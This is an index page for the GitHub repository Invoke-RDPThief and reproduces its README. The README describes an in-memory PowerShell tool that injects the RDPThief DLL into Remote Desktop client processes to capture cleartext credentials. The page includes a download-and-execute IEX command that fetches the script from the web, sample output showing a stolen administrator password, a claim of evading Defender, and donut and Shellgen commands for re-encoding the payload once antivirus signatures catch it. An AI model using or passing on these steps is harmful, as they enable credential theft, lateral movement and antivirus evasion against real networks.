Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/the-viper-one/invoke-rdpthief

Inject RDPThief into memory with PowerShell.
https://github.com/the-viper-one/invoke-rdpthief

injection lateral-movement pentesting powershell rdp

Last synced: about 10 hours ago
JSON representation

Inject RDPThief into memory with PowerShell.

Host: GitHub
URL: https://github.com/the-viper-one/invoke-rdpthief
Owner: The-Viper-One
Created: 2024-10-01T20:12:00.000Z (4 months ago)
Default Branch: main
Last Pushed: 2025-01-21T20:12:33.000Z (about 24 hours ago)
Last Synced: 2025-01-21T20:30:05.237Z (about 23 hours ago)
Topics: injection, lateral-movement, pentesting, powershell, rdp
Language: PowerShell
Homepage:
Size: 217 KB
Stars: 58
Watchers: 1
Forks: 8
Open Issues: 0
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

README

# Invoke-RDPThief

This PowerShell script runs on a loop hunting for mstsc.exe processes. When any are found, the script will perform process injection on the target process and inject RDPthief into the process in order to capture cleartext credentials.

RDPThief.dll was converted to shellcode with Donut, then converted to UUIDs with Shellgen to hide the shellcode in plainsight within the script. The UUIDs are then converted back into shellcode at runtime and injected whilst staying completley in memory.

- Works against Defender as of 01/10/2024
- Requires Administrative rights

## Usage
```powershell
# Load into memory and execute
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/Invoke-RDPThief/refs/heads/main/Invoke-RDPThief.ps1")

```
## Output
```
[*] Hunting for mstsc...

[+] Successfully injected into process 5496

[+] Extracted Credentials

Server : DC01.Security.local
Username : SECURITY\administrator
Password : Password123
```

## Payload creation
The payload in the script is ready to go however, the steps below can be followed if the payload is signatured in the future.

Convert RDPThief.dll into shellcode with Donut.
```
.\donut.exe -f:1 --input:C:\RdpThief.dll -e 3 -b 1 -x 3 -k 2
```

Convert to UUID with Shellgen
```powershell
Shellgen -RawFile "C:\loader.bin" -OutputFormat UUID
```
Take the output and place it into the $UUIDs array in Invoke-RDPThief.ps1

RDPThief: https://github.com/0x09AL/RdpThief

Donut: https://github.com/TheWover/donut

Shellgen: https://github.com/Leo4j/ShellGen